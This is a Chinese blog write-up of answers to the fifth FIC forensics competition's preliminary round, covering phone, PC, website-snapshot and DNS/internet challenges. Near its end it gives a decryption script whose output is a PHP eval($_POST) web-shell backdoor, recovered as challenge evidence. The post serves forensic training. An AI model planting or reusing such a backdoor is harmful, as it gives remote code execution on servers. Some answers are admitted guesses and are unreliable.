第五届FIC初赛wp

最新推荐文章于 2025-05-09 16:31:38 发布

zzpu213

最新推荐文章于 2025-05-09 16:31:38 发布

阅读量835

点赞数 23

CC 4.0 BY-SA版权

分类专栏：取证文章标签：学习

本文链接：https://blog.youkuaiyun.com/2301_81210668/article/details/147706195

取证专栏收录该内容

9 篇文章

订阅专栏

第五届FIC初赛wp

容器密码:3x@9Qm!V8e$vL%6d^Yr5o*C#Nk7h&ZpFbW2sG4jXuD1cO0lTgAqHwRnIzJyM-_+K=

第一次打fic也是干到了前十，我主要做的手机部分和互联网的前半部分，感觉题目不太难，最后基本上都做完了，就差互联网的后面连接密码和银行卡密码。连接密码当时有思路，但是没做出来，赛后复现出来了。还得感谢队友直接19.9买下了科大讯飞的语音转文字，还有想到了之前NewStarCTF的一道题目，用了互联网档案馆。

第一部分网页快照

检材1-网站快照

“老赵商城系统”并非公开推广的普通电商平台，而是一个仅限内部使用、受邀注册的封闭系统。李某利用这套系统，建立起一条以代理人和渠道商为主导的销售链条，将他定制、经过特殊改装的针孔摄像头销售给经过严格筛选的代理成员

1. 请分析检材一，该取证录像文件的 SHA256 值为【答案格式：a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3】不区分大小写

2753da22fe23cadaadc14fe4c1d5096a153360d9f91097ea376846431f5c1567

2. 请分析检材一，远程取证所使用的 OBS 工具版本号为【答案格式：18.1.2】

29.1.3

3. 请分析检材一，该检材所使用的远程取证的工具名称为【答案格式：单选题】

A. 网镜

B. 快照大师

C. 网页专家

D. 网页取证能手

弘联的网*系列

4. 请分析检材一，在该检材中，远程取证过程中校验的北京时间为【答案格式：单选题】

A. 2025/4/9 13:33:18

B. 2025/4/9 13:34:18

C. 2025/4/9 13:35:18

D. 2025/4/9 13:36:18

5. 请分析检材一，远程取证的网站 IP 地址为【答案格式：192.168.1.20】

172.16.10.200

6. 请分析检材一，在该检材中，远程取证的网站密码为【答案格式：root111】

admin123

7. 请分析检材一，在已固定的“订单列表”中发现有一页缺失。请找出缺失页面的具体页码为【答案格式：1】

我们当时这道题是靠盯帧哥，每一张图片的页码拿出来，然后进行了从小到大的排序，可以发现中间少了12这页。

8. 请分析检材一，补充“订单列表”中缺失页面的数据后，统计订单的总数为【答案格式：2000】

4000

视频中就能找到

9. 请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”的订单数为【答案格式：200】

238

不太想做了，队友这里是人肉200张图片眼看统计的。

10. 请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”的ZK-101产品的订单数为【答案格式：100】

依旧人眼ocr

11. 请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”产品在上海区域的订单数为【答案格式：5】

下面几题不太想做了，放弃了，题目有点逆天，以后要是要是哪个队友卡住就安排来做肉眼盯帧的题目。大致思路就是ocr图片，然后把识别出来的数据转表格分析。

12. 请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”的销售情况，并计算“赵磊（13967346658）”优惠后的总金额为（例如，优惠率为10%时按原单价的90%计算）【答案格式：4000】

13. 请分析检材一，补充“代理列表”中缺失页面的数据后，统计代理人的最大层级数为（其中顶级代理的用户定义为第1层）【答案格式：3】

14. 请分析检材一，补充“代理列表”中缺失页面的数据后，统计每位代理的直接下游人数，并确定直接下游人数排名第一的代理人为【答案格式：张三】

15. 请分析检材一，补充“代理列表”中缺失页面的数据后，根据地址信息统计各区域的代理人数，并确定上海区域的代理人数为【答案格式：10】

第二部分手机取证

检材2-李某手机

老李沟通生意所用的设备

1. 请分析检材二，请分析"手机"检材，并回答，并回答该手机的device_name是？【答案格式：Iphone 16 Pro】

Redmi 6 Pro

火眼没有分析出来，直接上的全局爆搜device_name，在这个目录下面能找到/adb/lspd/log/props.txt

2. 请分析检材二，请分析"手机"检材，并回答，嫌疑人pc开机密码是什么？【答案格式：abc123】

1qaz2wsx

开了耗时之后跑出来一个备忘录日记，打开看

找到数据库，里面存在开机密码

3. 请分析检材二，请分析"手机"检材，并回答，嫌疑人接头暗号是什么？【答案格式：天青色等烟雨而我在等你】

爱能不能够永远单纯没有悲哀

看上图，第一条说了接头暗号，对应一张开头为ub69的png图片，找一下，就能找到了

4. 请分析检材二，请分析"手机"检材，并回答，嫌疑人存放的秘钥环是多少？【答案格式：123abc】

1qaz2wsx3edc

在便签里面分析出来这个

然后翻一下小米便签，在数据库里面找到了

5. 请分析检材二，请分析"手机"检材，并回答，嫌疑人一生中最重要的日子是什么时候？

2026-02-26

这道题目也跑了耗时，发现找到了一张截图，距离2025/04/12，还有一天，那么今天就是2025/04/11

找在线工具或者ai，就行了

6. 请分析检材三，请分析"手机"检材，并回答，嫌疑人微信生成的聊天记录数据库文件名称是什么？【答案格式：Wx.db】

EnMicroMsg.db

7. 请分析检材二，请分析"手机"检材，并回答，嫌疑人微信账号对应的UIN为多少？【答案格式：123456789】

1864810197

根据川佬的妙妙小工具找的地方

8. 请分析检材二，请分析"手机"检材，并回答，嫌疑人微信聊天记录数据库的加密秘钥是什么？【答案格式：abc1234】

31ad809

根据妙妙工具的提示生成了密钥然后验证一下就行了

9. 请分析检材二，请分析"手机"检材，并回答，嫌疑人“欠条.rar”的解压密码是多少？【答案格式：3001234123】

3170010703

已经告诉了密码是他的号码

在这里发了一张图片后就没有东西了，说明这图片里面肯定有隐写之类的东西

说是发的是略缩图，我们要去它的目录下面找原图，找到两张一样的图片，其中一张上面有二维码

用Stegsolve处理一下图片，得到清晰的二维码，然后扫就行了

微信直接能扫出来了，密码应该是不加区号的

10. 请分析检材二，请分析"手机"检材，并回答，嫌疑人“欠条.rar”解压后，其中VeraCrypt容器的MD5值是多少？【答案格式：c788542ea8dcb75ge5768930cq7260kj】不区分大小写

83da62aabc88cb1b23e9469142b67b80

11. 请分析检材二，请分析"手机"检材，并回答，嫌疑人提供的“欠条.rar”解压后，其中"1.png"图上显示的VeraCrypt容器密码是多少？【答案格式：ABCD1234&#￥%】

#!@KE2sax@!da0h5hghg34&@

这样子处理完相对比较清楚，慢慢看慢慢试，反正密码对了才能解开容器

12. 请分析检材二，请分析"手机"检材，并回答，嫌疑人李某全名是什么？【答案格式：李一二】

李安弘

13. 请分析检材二，请分析"手机"检材，并回答，嫌疑人欠款金额是多少？【答案格式：70000】

80000

同上图

第三部分介质取证

检材3-李某电脑

老李用于存放个人物品的设备

1. 请分析检材三，请分析"电脑"检材，并回答，该电脑最后一次开机时间是？【答案格式：单选题】

2025-04-14 11:49:47

2. 请分析检材三，请分析"电脑"检材，并回答，嫌疑人的备用机号码是多少？【答案格式：13712341234】

18877332134

说这个便签里面都是文字加符号，这里不一样，中间有个一个obj符号，应该是有什么东西没有解析出来

3. 请分析检材三，请分析"电脑"检材，并回答，域名dgy02.com曾保存过一个密码，该密码是多少？【答案格式：abc1234】

tcgg123456

这道题目仿真起来，用手机里面的google密钥串解密就可以出这个密码了

4. 请分析检材三，请分析"电脑"检材，并回答，其电脑安装的微信版本是多少？【答案格式：1.0.0.0】

4.0.0.21

5. 请分析检材三，请分析"电脑"检材，并回答，该系统有哪些远程控制软件【答案格式：多选题】

A. todesk

B. 向日葵

C. raylink

D. 爱思远

一个个搜吧

6. 请分析检材三，请分析"电脑"检材，并回答，电脑2025年4月10日11点4分29秒曾被向日葵远程控制，其记录的日志文件名为【答案格式：login.log.1】

sunlogin_service.log.2

7. 请分析检材三，请分析"电脑"检材，并回答，电脑2025年4月10日11点4分29秒曾被向日葵远程控制，日志内记录对方公网IP地址和端口为【答案格式：127.0.0.1:1000】

182.100.46.36:4110

看上图

8. 请分析检材三，请分析"电脑"检材，并回答，某文件的MD5值为“2bdfcdbd6c63efc094ac154a28968b7d”，该文件名为【答案格式：abc.txt】

important.docx

其实先看了下一题，这一题直接检验一下md5对不对就行了

9. 请分析检材三，请分析"电脑"检材，据调查，上述文件存放了钱包助记词，第一个单词是什么？【答案格式：apple】

solution

直接让火眼来识别吧

10. 请分析检材三（“我的测试机”），最近曾访问过的音频文件，该音频文件的文件名是什么【答案格式：凡人修仙传.mp3】

自传小说.MP3

11. 请分析检材三（“我的测试机”），最近曾使用过USB设备，该设备的名称为

A. ThinkPLus

B. Toshiba

C. Samsumg

D. Database

12. 请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人现任妻子毕业的大学是？【答案格式：武汉大学】

北京大学

这里直接用了队友给的语音转文字后的txt文档，直接看了

一开始是说他和这个柴可惜是在上海大学认识的，但是后面说他们分开了

后面是因为搞灰产认识了现任妻子

13. 请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人是通过一个朋友认识的陈老板，该朋友姓氏拼音是？【答案格式：chen】

wang

14. 请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人所说的香格里拉大酒店实则是？【答案格式：桌游室】

棋牌室

15. 请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人银行密码是多少？【答案格式：123456】

071492

这道脑洞题，当时没做出来，好像说是每段话的第一个字的谐音，有点逆天。其实打开看，还是挺明显的，分成13个段落，然后确实可能有东西藏头

口音有点重，听了好几遍，所以密码就是071492

林五常  
起初
一次次
四楼
就是
而每当

感觉出成ctf题目反而合理一点，太阴间了

第四部分互联网取证

互联网

警方在服务器中发现了疑似陈某的网站域名，通过该域名警方成功找到陈某的互联网身份和相关ip。请选手固定所有题目相关互联网部分内容

1. 请分析检材二，找到李某上游人员陈某博客宣传所用域名为【答案格式：forensix.cn】

chen.foren6

还是刚刚那张图片，里面写了博客的域名

2. 请分析陈某宣传所用域名，该域名的顶级域名在以下那个区块链注册

A. ETH（https://ens.domains/）

B. HNS（https://handshake.org/）

C. BTC（https://bitcoin.org/）

D. Namecoin（https://www.namecoin.org/）

当时做的时候问了ai，说是B，后面也能印证这道题就是B

3. 请分析陈某宣传所用域名的顶级域名的域名解析服务器（DNS）共有几个【答案格式：1】

问了ai说这是去中心化域名系统注册的，需要用支持Handshake 的区块浏览器来查询。这里推荐了Niami.io，然后发现有两个NS，所以就是2

4. 请分析陈某宣传所用域名的顶级域名的NS1服务器ip为【答案格式：1.1.1.1】

45.79.133.98

5. 请分析陈某宣传所用域名，该域名DNS记录指向邮件服务器域名为【答案格式：mail.qq.com】

mail.163.com

6. 请分析陈某宣传所用域名，该域名的TXT记录中chen的值为【答案格式：jianrenfengbao】

fengbaoliejiu

7. 请分析陈某宣传所用域名，该域名DNS记录没有以下那个域名

A. admin.chen.foren6

B. caidan.chen.foren6

C. fichen.foren6

D. hl.chen.foren6

这题好像CD都是没有返回值的，所以CD应该都是。这是其中两个选项，关注status的内容，一个是nxdomain一个是noerror。

8. 请分析陈某宣传所用域名，该博客域名最终DNS解析指向的github仓库名为【答案格式：git.github.cn】

chewhaoN.github.io

可以直接搜到这个chen.foren6，根据手机部分的陈浩北，也能说明这个就是指向的地方

直接就能找到仓库的地方

9. 请分析陈某github账号，陈某对jkroepke/2Moons项目增改了几个文件【答案格式：1】

比赛的时候下了这个软件，当时对比出来是222个，复盘发现好像是两边的换行符不同，但是文件内容都是一样的，所以不知道最终答案算222还是2，可能出题人考虑还是2比较合理

10. 请分析陈某github账号，陈某在修改2Moons过程中提到了什么锅底【答案格式：麻辣锅底】

蜂蜜锅底

比赛的时候这道题没思路，搜不出来，先做的后一题，后一题搜了一个aes，直接定位到了这个url的地方

11. 请分析陈某github账号，陈某在游戏2Moons中放置的后门连接码的密码为【答案格式：abcde】

ficnb

这里后面也说了，就是那个encrypted.bin的解密就能出了，当时让ai跑一个python脚本，但是发现那个能访问到但是脚本读不了key和iv，ai一开始给我了php脚本，我没怎么用过，就没用了，赛后队友用php脚本跑出了后面连接码

import requests
from hashlib import md5
from base64 import b64decode
from Crypto.Cipher import AES

css_url = "https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css"
response = requests.get(css_url, verify=False)  # 添加 verify=False
css_content = response.content

key = md5(css_content).digest()

with open("encrypted.bin", "rb") as f:
    encrypted_b64 = f.read()
encrypted_data = b64decode(encrypted_b64)

iv = encrypted_data[:16]
ciphertext = encrypted_data[16:]

# 注意：原始PHP代码使用aes-256-cbc，但MD5生成的密钥是128位（16字节）
# 需要将密钥填充到32字节（AES-256要求）
key_padded = key.ljust(32, b'\0')  # 用零填充到32字节
cipher = AES.new(key_padded, AES.MODE_CBC, iv=iv)
decrypted = cipher.decrypt(ciphertext)

# 去除填充
pad = decrypted[-1]
decrypted = decrypted[:-pad]

print(decrypted.decode())
'''
function yijuhua() {
    echo "Kangle) is OK! FICer is good!";
        eval($_POST[ficnb])
}
'''